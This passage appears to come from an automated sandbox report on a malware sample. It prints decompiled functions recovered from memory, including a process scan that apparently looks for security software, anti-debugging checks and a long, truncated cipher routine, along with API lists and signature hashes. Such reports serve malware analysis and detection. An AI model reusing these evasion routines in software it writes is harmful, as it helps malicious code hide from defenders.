				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x75d2e0; // 0x25ca5a8
						_t2 = _t9 + 0x75ee3c; // 0x73617661
						_push( &_v264);
						if( *0x75d110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00754a0e
0x00754a18
0x00754a1c
0x00754a26
0x00754a57
0x00754a2d
0x00754a32
0x00754a3f
0x00754a48
0x00754a5f
0x00754a4a
0x00754a52
0x00000000
0x00754a52
0x00754a60
0x00754a61
0x00000000
0x00754a61
0x00000000
0x00754a5b
0x00754a67
0x00754a6c

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00754A13
Process32First.KERNEL32(00000000,?), ref: 00754A26
Process32Next.KERNEL32(00000000,?), ref: 00754A52
CloseHandle.KERNEL32(00000000), ref: 00754A61

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f95741d64eb3e88453783cfacc0bb12458439cf5e380e5300e495cdc7651e51d
Instruction ID: 7f9deb935c0ddae7ff6ae3ab777eec0673a99fd7719998a67dcfa1b3927629fc
Opcode Fuzzy Hash: f95741d64eb3e88453783cfacc0bb12458439cf5e380e5300e495cdc7651e51d
Instruction Fuzzy Hash: 91F0F631500258AAD771A7668C09EEB32ACDBC571BF004052FD15D3001EAECDEC987A9

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE1825, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECE1825() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6ece41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6ece41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6ece41ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6ece41a8 = _t5;
						 *0x6ece41b0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6ece41a4 = _t6;
						if(_t6 == 0) {
							 *0x6ece41a4 =  *0x6ece41a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6ece1826
0x6ece1834
0x6ece183a
0x6ece1841
0x6ece1898
0x6ece1898
0x6ece1843
0x6ece184b
0x6ece1858
0x6ece1858
0x6ece1894
0x6ece1896
0x00000000
0x00000000
0x00000000
0x6ece184d
0x6ece1854
0x6ece185a
0x6ece185a
0x6ece185f
0x6ece186d
0x6ece1872
0x6ece1878
0x6ece187e
0x6ece1885
0x6ece1887
0x6ece1887
0x6ece1891
0x6ece1856
0x6ece1856
0x00000000
0x6ece1856
0x6ece1854

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6ECE15D1), ref: 6ECE1834
GetVersion.KERNEL32 ref: 6ECE1843
GetCurrentProcessId.KERNEL32 ref: 6ECE185F
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6ECE1878

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 28c8c37e33d6e025f919d944e4f4a66085b6e1b1dca2154e54833d8e0238709c
Instruction ID: a3afcd13ff1b0f4d45ec6880ca50a644f938a7d452077980f2dccf18c28734d4
Opcode Fuzzy Hash: 28c8c37e33d6e025f919d944e4f4a66085b6e1b1dca2154e54833d8e0238709c
Instruction Fuzzy Hash: 3CF0C231A44B01EFEF608FACAE197653BB0F707711F01005AF511C65D8E37090468B94

Uniqueness

Uniqueness Score: -1.00%

Function 6ED26CB3, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6ED26DAB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6ED26DB5
UnhandledExceptionFilter.KERNEL32(?), ref: 6ED26DC2

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: aaf09d3df544a01de52b035159d0baceb0c6d8200884f95cff95c17f2141fca3
Instruction ID: 63e3bfacf128d6ff33aa4bcdb0a76820430b078de6db4e3bea98faa17bfa614e
Opcode Fuzzy Hash: aaf09d3df544a01de52b035159d0baceb0c6d8200884f95cff95c17f2141fca3
Instruction Fuzzy Hash: 9C31D27591132CABCB61DF64D988BCCBBB8AF08314F5045EAE51CA7290EB309B858F54

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3C325, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6ED3C324,?,000000FF,?,?,?,00000004), ref: 6ED3C347
TerminateProcess.KERNEL32(00000000,?,6ED3C324,?,000000FF,?,?,?,00000004), ref: 6ED3C34E
ExitProcess.KERNEL32 ref: 6ED3C360

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5d04ebb46b0e1c6163d4815ae4136ee156f319bf409d3d017d6f8cb49639957a
Instruction ID: c50dd691171eb2dbcd2b472120f33fae415294c1ce07aab55bc8f3067b12fbe1
Opcode Fuzzy Hash: 5d04ebb46b0e1c6163d4815ae4136ee156f319bf409d3d017d6f8cb49639957a
Instruction Fuzzy Hash: DEE08C31000A68EFDF41AFA1C848E8C7B28FB02281F100810F8058A1A0CB35E882CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00757DEC, Relevance: 3.0, Strings: 1, Instructions: 1702
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00757DEC(void* __eax, signed int* __ecx, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int* _t581;
				signed int _t584;
				signed int _t592;
				signed int _t596;
				signed int _t602;
				signed int _t605;
				signed int _t606;
				signed int _t610;
				signed int _t612;
				signed int _t614;
				signed int _t621;
				signed int _t626;
				signed int _t634;
				signed int _t635;
				signed int _t636;
				signed int _t638;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t649;
				signed int _t653;
				signed int _t657;
				signed int _t667;
				signed int _t671;
				signed int _t674;
				signed int _t676;
				signed int _t678;
				signed int _t685;
				signed int _t690;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t702;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t713;
				signed int _t717;
				signed int _t721;
				signed int _t731;
				signed int _t735;
				signed int _t738;
				signed int _t740;
				signed int _t742;
				signed int _t749;
				signed int _t754;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t766;
				signed int _t770;
				signed int _t774;
				signed int _t777;
				signed int _t781;
				signed int _t785;
				signed int _t795;
				signed int _t799;
				signed int _t802;
				signed int _t804;
				signed int _t806;
				signed int _t813;
				signed int _t818;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t830;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t845;
				signed int _t848;
				signed int _t853;
				signed int _t858;
				signed int _t860;
				signed int _t870;
				signed int _t874;
				signed int _t875;
				signed int _t878;
				signed int _t879;
				signed int _t887;
				signed int _t888;
				signed int _t895;
				signed int _t896;
				signed int _t900;
				signed int _t905;
				signed int _t906;
				signed int _t912;
				signed int _t913;
				signed int _t916;
				signed int _t918;
				signed int _t923;
				signed int _t925;
				signed int _t935;
				signed int _t939;
				signed int _t940;
				signed int _t943;
				signed int _t944;
				signed int _t952;
				signed int _t953;
				signed int _t960;
				signed int _t961;
				signed int _t965;
				signed int _t970;
				signed int _t971;
				signed int _t977;
				signed int _t978;
				signed int _t981;
				signed int _t983;
				signed int _t988;
				signed int _t990;
				signed int _t1000;
				signed int _t1004;
				signed int _t1005;
				signed int _t1008;
				signed int _t1009;
				signed int _t1017;
				signed int _t1018;
				signed int _t1025;
				signed int _t1026;
				signed int _t1030;
				signed int _t1031;
				signed int _t1033;
				signed int _t1034;
				signed int _t1038;
				signed int _t1039;
				signed int _t1042;
				signed int _t1044;
				signed int _t1049;
				signed int _t1051;
				signed int _t1061;
				signed int _t1065;
				signed int _t1066;
				signed int _t1069;
				signed int _t1070;
				signed int _t1078;
				signed int _t1079;
				signed int _t1086;
				signed int _t1087;
				signed int _t1095;
				signed int _t1096;
				signed int _t1099;
				signed int _t1100;
				signed int _t1103;
				signed int _t1107;
				signed int _t1108;
				signed int _t1111;
				signed int _t1112;
				signed int _t1114;
				signed int _t1118;
				signed int _t1121;
				signed int _t1125;
				signed int _t1129;
				signed int _t1134;
				signed int _t1138;
				signed int _t1141;
				signed int _t1146;
				signed int _t1153;
				signed int _t1156;
				signed int _t1161;
				signed int _t1164;
				signed int _t1167;
				signed int _t1170;
				signed int _t1171;
				signed int _t1175;
				signed int _t1176;
				signed int _t1179;
				signed int _t1180;
				signed int _t1182;
				signed int _t1186;
				signed int _t1189;
				signed int _t1193;
				signed int _t1197;
				signed int _t1202;
				signed int _t1206;
				signed int _t1209;
				signed int _t1214;
				signed int _t1221;
				signed int _t1224;
				signed int _t1229;
				signed int _t1232;
				signed int _t1235;
				signed int _t1238;
				signed int _t1239;
				signed int _t1243;
				signed int _t1244;
				signed int _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1254;
				signed int _t1257;
				signed int _t1261;
				signed int _t1265;
				signed int _t1270;
				signed int _t1274;
				signed int _t1277;
				signed int _t1282;
				signed int _t1289;
				signed int _t1292;
				signed int _t1297;
				signed int _t1305;
				signed int _t1310;
				signed int _t1311;
				signed int _t1315;
				signed int _t1316;
				signed int _t1319;
				signed int _t1320;
				signed int _t1322;
				signed int _t1326;
				signed int _t1329;
				signed int _t1333;
				signed int _t1337;
				signed int _t1342;
				signed int _t1346;
				signed int _t1349;
				signed int _t1354;
				signed int _t1361;
				signed int _t1369;
				signed int _t1372;
				signed int _t1373;
				signed int _t1374;
				signed int _t1379;
				signed int _t1383;
				signed int _t1393;
				signed int _t1397;
				signed int _t1399;
				signed int _t1403;
				signed int _t1404;
				signed int _t1408;
				signed int _t1411;
				signed int _t1413;
				signed int _t1414;
				signed int _t1417;
				signed int _t1421;
				signed int _t1427;
				signed int _t1429;
				signed int _t1430;
				signed int _t1434;
				signed int _t1437;
				signed int _t1441;
				signed int _t1443;
				signed int _t1446;
				signed int _t1452;
				signed int _t1457;
				signed int _t1461;
				signed int _t1467;
				signed int _t1470;
				signed int _t1471;
				signed int _t1472;
				signed int _t1474;
				signed int _t1478;
				signed int _t1479;
				signed int _t1483;
				signed int _t1486;
				signed int _t1488;
				signed int _t1489;
				signed int _t1492;
				signed int _t1496;
				signed int _t1502;
				signed int _t1504;
				signed int _t1505;
				signed int _t1509;
				signed int _t1512;
				signed int _t1516;
				signed int _t1518;
				signed int _t1521;
				signed int _t1527;
				signed int _t1532;
				signed int _t1536;
				signed int _t1542;
				signed int _t1545;
				signed int _t1546;
				signed int _t1547;
				signed int _t1549;
				signed int _t1553;
				signed int _t1554;
				signed int _t1558;
				signed int _t1561;
				signed int _t1563;
				signed int _t1564;
				signed int _t1567;
				signed int _t1571;
				signed int _t1577;
				signed int _t1579;
				signed int _t1580;
				signed int _t1584;
				signed int _t1587;
				signed int _t1591;
				signed int _t1593;
				signed int _t1594;
				signed int _t1595;
				signed int _t1598;
				signed int _t1604;
				signed int _t1609;
				signed int _t1613;
				signed int _t1619;
				signed int _t1622;
				signed int _t1623;
				signed int _t1624;
				signed int _t1626;
				signed int _t1630;
				signed int _t1631;
				signed int _t1635;
				signed int _t1638;
				signed int _t1640;
				signed int _t1641;
				signed int _t1644;
				signed int _t1648;
				signed int _t1654;
				signed int _t1656;
				signed int _t1657;
				signed int _t1661;
				signed int _t1664;
				signed int _t1665;
				signed int _t1666;
				signed int _t1670;
				signed int _t1675;
				signed int _t1676;
				signed int _t1679;
				signed int _t1682;
				signed int _t1683;
				signed int _t1689;
				signed int _t1691;
				signed int _t1697;
				signed int _t1701;
				signed int _t1706;
				signed int _t1708;
				signed int _t1712;
				signed int _t1716;
				signed int _t1721;
				signed int _t1722;
				signed int _t1724;
				signed int _t1728;
				signed int _t1729;
				signed int _t1732;
				signed int _t1737;
				signed int _t1743;
				signed int _t1745;
				signed int _t1746;
				signed int _t1752;
				signed int _t1754;
				signed int _t1760;
				signed int _t1764;
				signed int _t1769;
				signed int _t1771;
				signed int _t1775;
				signed int _t1779;
				signed int _t1784;
				signed int _t1785;
				signed int _t1787;
				signed int _t1791;
				signed int _t1792;
				signed int _t1795;
				signed int _t1800;
				signed int _t1806;
				signed int _t1808;
				signed int _t1809;
				signed int _t1815;
				signed int _t1817;
				signed int _t1823;
				signed int _t1827;
				signed int _t1832;
				signed int _t1834;
				signed int _t1838;
				signed int _t1842;
				signed int _t1847;
				signed int _t1848;
				signed int _t1850;
				signed int _t1854;
				signed int _t1855;
				signed int _t1860;
				signed int _t1866;
				signed int _t1868;
				signed int _t1869;
				signed int _t1875;
				signed int _t1877;
				signed int _t1883;
				signed int _t1887;
				signed int _t1892;
				signed int _t1894;
				signed int _t1898;
				signed int _t1902;
				signed int _t1907;
				signed int _t1908;
				signed int _t1913;
				signed int _t1915;
				signed int _t1916;
				signed int _t1917;
				signed int _t1921;

				_t584 =  *(__eax + 0x28) ^ __ecx[2] ^  *(__eax + 0x238);
				_t1103 =  *(__eax + 0x20) ^  *__ecx ^  *(__eax + 0x230);
				_t1679 =  *(__eax + 0x24) ^ __ecx[1] ^  *(__eax + 0x234);
				_t845 =  *(__eax + 0x2c) ^ __ecx[3] ^  *(__eax + 0x23c);
				_v8 = _t845 | _t1103;
				_t848 = _t584 ^ _t1679;
				_v12 = _t845 ^ _t1679;
				_v24 = _t848;
				_t1379 = _t1679 ^ _t1103;
				_v16 = _t848 ^ _v8;
				_t853 = (_t1379 & _t584 |  !_v12) ^ (_v24 | _t1103);
				_t1383 = _t1379 & _v12 ^ _t853 ^ _v16 ^ _t1103;
				_t592 = (_t1383 | _t853) & _v8 ^ _t1679;
				asm("rol ecx, 0xd");
				asm("rol ebx, 0x3");
				_t1682 = _t592 ^ _t1383 ^ _t853;
				_v12 = _t853;
				asm("rol esi, 1");
				_t1107 = _t853 << 0x00000003 ^ _t592 ^ _v16;
				asm("rol edx, 0x7");
				_t1683 = _t1682 ^  *(__eax + 0x34);
				_t1108 = _t1107 ^  *(__eax + 0x3c);
				asm("rol ecx, 0x16");
				_t858 = _t1682 << 0x00000007 ^ _t592 ^ _t1107 ^  *(__eax + 0x38);
				asm("rol ebx, 0x5");
				_t596 = _t1682 ^ _v12 ^ _t1107 ^  *(__eax + 0x30);
				_v20 = _t596 ^ _t1108;
				_v16 = _t1683 ^ _t1108;
				_v8 =  !_t858;
				_v12 = _t596;
				_t1393 = _t1683 & _t596 ^ _v8 ^ _v16;
				_v8 = _v8 | _t1683;
				_t602 = (_v16 ^ _v12) & (_t1108 | _t1393) ^ _v8;
				_t860 = _t858 ^ _t1108 ^ _t602;
				_t1689 = (_v20 | _t1393) ^ _t860 ^ _v8;
				_v24 = _t860;
				asm("rol esi, 0xd");
				asm("rol edi, 0x3");
				_t1111 = _t1393 ^ _t602 ^ _t1689;
				asm("rol edx, 1");
				asm("rol ecx, 0x7");
				_t605 = (_v16 | _v20) ^ _t1689 << 0x00000003 ^ _v24 ^ _t1393;
				_t606 = _t605 ^  *(__eax + 0x4c);
				_t1112 = _t1111 ^  *(__eax + 0x44);
				asm("rol ecx, 0x16");
				_t870 = _t1111 << 0x00000007 ^ _t605 ^ _t1393 ^  *(__eax + 0x48);
				asm("rol edi, 0x5");
				_t1397 = _t605 ^ _t1111 ^ _t1689 ^  *(__eax + 0x40);
				_v16 = _t606;
				_t1691 =  !_t1397;
				_v20 = _t606 ^ _t1112;
				_t610 = _t1691 & _t870 ^ _v20;
				_v8 = _t1397;
				_v12 = _t610;
				_t1399 = _t1691 ^ _t870;
				_t612 = (_t610 ^ _t870) & _t1112;
				_t1114 = _t612 ^ _t1399;
				_t614 = (_t1399 | _v12) & (_t612 | _v16) ^ _v8;
				asm("rol dword [ebp-0x8], 0xd");
				asm("rol ebx, 0x3");
				_t1697 = (_t1691 | _v16) ^ _t614 ^ _v20 ^ _t614 ^ _v12 ^ _t1114;
				asm("rol esi, 1");
				_t1403 = _t1697;
				_t874 = _v12 << 0x00000003 ^ _t614 ^ _t1114;
				asm("rol ecx, 0x7");
				asm("rol esi, 0x16");
				_t1701 = _t1697 << 0x00000007 ^ _t614 ^ _t874 ^  *(__eax + 0x58);
				_t1404 = _t1403 ^  *(__eax + 0x54);
				_t875 = _t874 ^  *(__eax + 0x5c);
				asm("rol edx, 0x5");
				_t1118 = _t1403 ^ _v12 ^ _t874 ^  *(__eax + 0x50);
				_v8 = _t1118 | _t875;
				_v16 = _t1404 & _t1118;
				_t621 = (_t1701 ^ _t1118) & _v8;
				_t1121 = (_t1118 & _t875 | _t1404) ^ _t621;
				_v24 = _t621;
				_t626 = (_v16 | _t1701) ^ _v24 ^ _t1404 ^ _t875;
				_t1408 = _v8 & _t626 ^ _v16 ^ _t1701;
				_t1706 =  !_t1408 & _t1121 ^ _v16 ^ _v8;
				asm("rol esi, 0xd");
				asm("rol edi, 0x3");
				_t878 = _t1408 ^ _t1121 ^ _t1706;
				_t1125 = _t1706 << 0x00000003 ^ _t626 ^ _t1408;
				asm("rol ecx, 1");
				asm("rol edx, 0x7");
				asm("rol ebx, 0x16");
				_v12 = _t878 << 0x00000007 ^ _t1125 ^ _t1408;
				_t879 = _t878 ^  *(__eax + 0x64);
				asm("rol ebx, 0x5");
				_t634 = _t1125 ^ _t878 ^ _t1706 ^  *(__eax + 0x60);
				_t1708 = _t879 ^ _t634;
				_t1411 =  *(__eax + 0x6c) ^ _t1125 ^ _t634;
				_v8 = _t1708;
				_t1712 = (_t1708 | _t1411) ^  *(__eax + 0x68) ^  !_t634 ^ _v12;
				_v24 = _t1411;
				_t1129 =  !_t1712;
				_t1413 = _t1129 | _t879;
				_v20 = _t1413;
				_t1414 = _t1413 ^ _v24;
				_v16 = _t1414;
				_t1417 = (_t1414 ^ _t879) & _v20 ^ _t1712 & _t634;
				asm("rol esi, 0xd");
				asm("rol edi, 0x3");
				_t1134 = (_t1129 | _t634) ^ _t1417 & _v16 ^ _v8 ^ _t1417 ^ _t1712;
				asm("rol edx, 1");
				_t635 = _t1134;
				_t887 = _t1712 << 0x00000003 ^ _t1417 ^ _v16;
				_t636 = _t635 ^  *(__eax + 0x74);
				asm("rol ecx, 0x7");
				_t888 = _t887 ^  *(__eax + 0x7c);
				asm("rol edx, 0x16");
				_t1138 = _t1134 << 0x00000007 ^ _t1417 ^ _t887 ^  *(__eax + 0x78);
				asm("rol edi, 0x5");
				_t1421 = _t635 ^ _t1712 ^ _t887 ^  *(__eax + 0x70);
				_v20 =  !_t1421;
				_t1716 = _t636 ^ _t1421;
				_v8 = (_t1421 ^ _t888 | _t1716) ^ _v20 ^ _t1138;
				_t1427 =  !_t888;
				_v16 = _t1427;
				_t1429 = _t1427 & _v8 ^ _t1716;
				_t1141 = (_t1138 | _v8) ^ (_t636 | _t1429) ^ _v16;
				asm("rol dword [ebp-0x4], 0xd");
				asm("rol ecx, 0x3");
				_t638 = (_t888 | _t1429) ^ (_t1141 | _v8) ^ _v20;
				_t1430 = _v8;
				_t1721 = _t638 ^ _t1429 ^ _t1430;
				asm("rol esi, 1");
				_t895 = _t1430 << 0x00000003 ^ _t1141 ^ _t638;
				asm("rol ecx, 0x7");
				asm("rol edx, 0x16");
				asm("rol ebx, 0x5");
				_t1146 = _t1721 << 0x00000007 ^ _t895 ^ _t638 ^  *(__eax + 0x88);
				_t642 = _t895 ^ _t1721 ^ _t1430 ^  *(__eax + 0x80);
				_t1722 = _t1721 ^  *(__eax + 0x84);
				_t896 = _t895 ^  *(__eax + 0x8c);
				_v12 = _t1146 ^ _t642;
				_t1434 = _t1146 ^ _t1722;
				_v20 = _t1146 | _t1722;
				_v28 = _t1434;
				_v8 =  !_t1434;
				_t1437 = _v12 ^ _t896;
				_v24 = _t1437 & _v20;
				_t1724 = _v24 ^ (_t896 | _t1722);
				_t1153 = _v20 & _v12;
				_v20 = _t1437 ^ _v8;
				_t1441 = _t1153 & _t1724 ^ _v20;
				_t1156 = (_t1153 ^ _v28 | _t1724) ^ _v20;
				asm("rol edi, 0xd");
				asm("rol edx, 0x3");
				_t900 = _t896 & _t642 ^ _v8 ^ _t1156 ^ _t1441;
				asm("rol ecx, 1");
				_v16 = _t1724;
				_v12 = _t1156;
				_t643 = _t900;
				_t1728 = _t1441 << 0x00000003 ^ _t1156 ^ _v16;
				_t644 = _t643 ^  *(__eax + 0x94);
				asm("rol esi, 0x7");
				asm("rol edx, 0x16");
				_t1161 = _t643 << 0x00000007 ^ _v12 ^ _t1728 ^  *(__eax + 0x98);
				_t1729 = _t1728 ^  *(__eax + 0x9c);
				asm("rol ecx, 0x5");
				_v8 = _t644;
				_v12 = _t900 ^ _t1441 ^ _t1728 ^  *(__eax + 0x90);
				_t905 =  !_t1161;
				_v28 = _t905;
				_t906 = _t905 | _t644;
				_v20 = _t1161 ^ _t644;
				_t1443 = _t906 ^ _t1729;
				_t1164 = _t1443 & _v12;
				_v24 = _t1164;
				_v16 = _t1164 ^ _v20;
				_t649 = (_v24 ^ _v8 | _v20) ^ _v12 ^ _t1729;
				_t1167 = _v24 ^ _t649;
				_t1732 = _t906 & _t1729 ^ _t1167 & _v16;
				_t1446 = (_t1443 | _v28) ^ _t1167 ^ _t1732;
				asm("rol edi, 0xd");
				asm("rol esi, 0x3");
				_t1170 = _t1732 ^ _t649 ^ _t1446;
				asm("rol edx, 1");
				_t912 = _t1446 << 0x00000003 ^ _v16 ^ _t1732;
				asm("rol ecx, 0x7");
				_v12 = _t1732;
				_t1171 = _t1170 ^  *(__eax + 0xa4);
				_t913 = _t912 ^  *(__eax + 0xac);
				asm("rol esi, 0x16");
				_t1737 = _t1170 << 0x00000007 ^ _t912 ^ _v12 ^  *(__eax + 0xa8);
				asm("rol ebx, 0x5");
				_t653 = _t912 ^ _t1170 ^ _t1446 ^  *(__eax + 0xa0);
				_v20 = _t913 | _t653;
				_t916 = _t1737 ^ _t1171;
				_v24 = _t913 ^ _t1171;
				_v8 = _t653;
				_v16 = _t916 ^ _v20;
				_t1452 = _t1171 ^ _t653;
				_t657 = (_t1452 & _t1737 |  !_v24) ^ (_t916 | _v8);
				_t918 = _t1452 & _v24 ^ _t657 ^ _v16 ^ _v8;
				asm("rol ebx, 0xd");
				_t1743 = (_t918 | _t657) & _v20 ^ _t1171;
				asm("rol esi, 0x3");
				_t1457 = _t1743;
				_t1745 = _t1743 ^ _t918 ^ _t657;
				asm("rol esi, 1");
				_t1175 = _t657 << 0x00000003 ^ _t1457 ^ _v16;
				asm("rol edx, 0x7");
				asm("rol ecx, 0x16");
				_t1746 = _t1745 ^  *(__eax + 0xb4);
				_t923 = _t1745 << 0x00000007 ^ _t1457 ^ _t1175 ^  *(__eax + 0xb8);
				_t1176 = _t1175 ^  *(__eax + 0xbc);
				asm("rol edi, 0x5");
				_t1461 = _t1745 ^ _t657 ^ _t1175 ^  *(__eax + 0xb0);
				_v20 = _t1461 ^ _t1176;
				_v16 = _t1746 ^ _t1176;
				_v24 =  !_t923;
				_v12 = _t1461;
				_t667 = _t1746 & _t1461 ^ _v24 ^ _v16;
				_v24 = _v24 | _t1746;
				_t1467 = (_v16 ^ _v12) & (_t1176 | _t667) ^ _v24;
				_t925 = _t923 ^ _t1176 ^ _t1467;
				_t1752 = (_v20 | _t667) ^ _t925 ^ _v24;
				_v28 = _t925;
				asm("rol esi, 0xd");
				asm("rol ebx, 0x3");
				_t1179 = _t667 ^ _t1467 ^ _t1752;
				asm("rol edx, 1");
				asm("rol ecx, 0x7");
				_t1470 = (_v16 | _v20) ^ _t1752 << 0x00000003 ^ _v28 ^ _t667;
				_t1471 = _t1470 ^  *(__eax + 0xcc);
				_t1180 = _t1179 ^  *(__eax + 0xc4);
				asm("rol ecx, 0x16");
				_t935 = _t1179 << 0x00000007 ^ _t1470 ^ _t667 ^  *(__eax + 0xc8);
				asm("rol ebx, 0x5");
				_t671 = _t1470 ^ _t1179 ^ _t1752 ^  *(__eax + 0xc0);
				_v16 = _t1471;
				_v8 = _t671;
				_t1472 = _t1471 ^ _t1180;
				_t1754 =  !_t671;
				_t674 = _t1754 & _t935 ^ _t1472;
				_v12 = _t674;
				_v24 = _t1472;
				_t676 = (_t674 ^ _t935) & _t1180;
				_t1474 = _t1754 ^ _t935;
				_t1182 = _t676 ^ _t1474;
				_t678 = (_t1474 | _v12) & (_t676 | _v16) ^ _v8;
				asm("rol dword [ebp-0x8], 0xd");
				asm("rol ebx, 0x3");
				_t1760 = (_t1754 | _v16) ^ _t678 ^ _v24 ^ _t678 ^ _v12 ^ _t1182;
				asm("rol esi, 1");
				_t939 = _v12 << 0x00000003 ^ _t678 ^ _t1182;
				_t1478 = _t1760;
				asm("rol ecx, 0x7");
				asm("rol esi, 0x16");
				_t1764 = _t1760 << 0x00000007 ^ _t678 ^ _t939 ^  *(__eax + 0xd8);
				_t1479 = _t1478 ^  *(__eax + 0xd4);
				_t940 = _t939 ^  *(__eax + 0xdc);
				asm("rol edx, 0x5");
				_t1186 = _t1478 ^ _v12 ^ _t939 ^  *(__eax + 0xd0);
				_v8 = _t1186 | _t940;
				_v16 = _t1479 & _t1186;
				_t685 = (_t1764 ^ _t1186) & _v8;
				_t1189 = (_t1186 & _t940 | _t1479) ^ _t685;
				_v28 = _t685;
				_t690 = (_v16 | _t1764) ^ _v28 ^ _t1479 ^ _t940;
				_t1483 = _v8 & _t690 ^ _v16 ^ _t1764;
				_t1769 =  !_t1483 & _t1189 ^ _v16 ^ _v8;
				asm("rol esi, 0xd");
				asm("rol edi, 0x3");
				_t943 = _t1483 ^ _t1189 ^ _t1769;
				asm("rol ecx, 1");
				_t1193 = _t1769 << 0x00000003 ^ _t690 ^ _t1483;
				asm("rol edx, 0x7");
				asm("rol ebx, 0x16");
				_v12 = _t943 << 0x00000007 ^ _t1193 ^ _t1483;
				asm("rol ebx, 0x5");
				_t698 = _t1193 ^ _t943 ^ _t1769 ^  *(__eax + 0xe0);
				_t944 = _t943 ^  *(__eax + 0xe4);
				_t1486 =  *(__eax + 0xec) ^ _t1193 ^ _t698;
				_t1771 = _t944 ^ _t698;
				_v20 = _t1771;
				_v28 = _t1486;
				_t1775 = (_t1771 | _t1486) ^  *(__eax + 0xe8) ^  !_t698 ^ _v12;
				_t1197 =  !_t1775;
				_t1488 = _t1197 | _t944;
				_v24 = _t1488;
				_t1489 = _t1488 ^ _v28;
				_v16 = _t1489;
				_t1492 = (_t1489 ^ _t944) & _v24 ^ _t1775 & _t698;
				asm("rol esi, 0xd");
				asm("rol edi, 0x3");
				_t1202 = (_t1197 | _t698) ^ _t1492 & _v16 ^ _v20 ^ _t1492 ^ _t1775;
				asm("rol edx, 1");
				_t952 = _t1775 << 0x00000003 ^ _t1492 ^ _v16;
				_t699 = _t1202;
				asm("rol ecx, 0x7");
				_t700 = _t699 ^  *(__eax + 0xf4);
				_t953 = _t952 ^  *(__eax + 0xfc);
				asm("rol edx, 0x16");
				_t1206 = _t1202 << 0x00000007 ^ _t1492 ^ _t952 ^  *(__eax + 0xf8);
				asm("rol edi, 0x5");
				_t1496 = _t699 ^ _t1775 ^ _t952 ^  *(__eax + 0xf0);
				_v24 =  !_t1496;
				_t1779 = _t700 ^ _t1496;
				_v8 = (_t1496 ^ _t953 | _t1779) ^ _v24 ^ _t1206;
				_t1502 =  !_t953;
				_v20 = _t1502;
				_t1504 = _t1502 & _v8 ^ _t1779;
				_t1209 = (_t1206 | _v8) ^ (_t700 | _t1504) ^ _v20;
				asm("rol dword [ebp-0x4], 0xd");
				asm("rol ecx, 0x3");
				_t702 = (_t953 | _t1504) ^ (_t1209 | _v8) ^ _v24;
				_t1505 = _v8;
				_t1784 = _t702 ^ _t1504 ^ _t1505;
				asm("rol esi, 1");
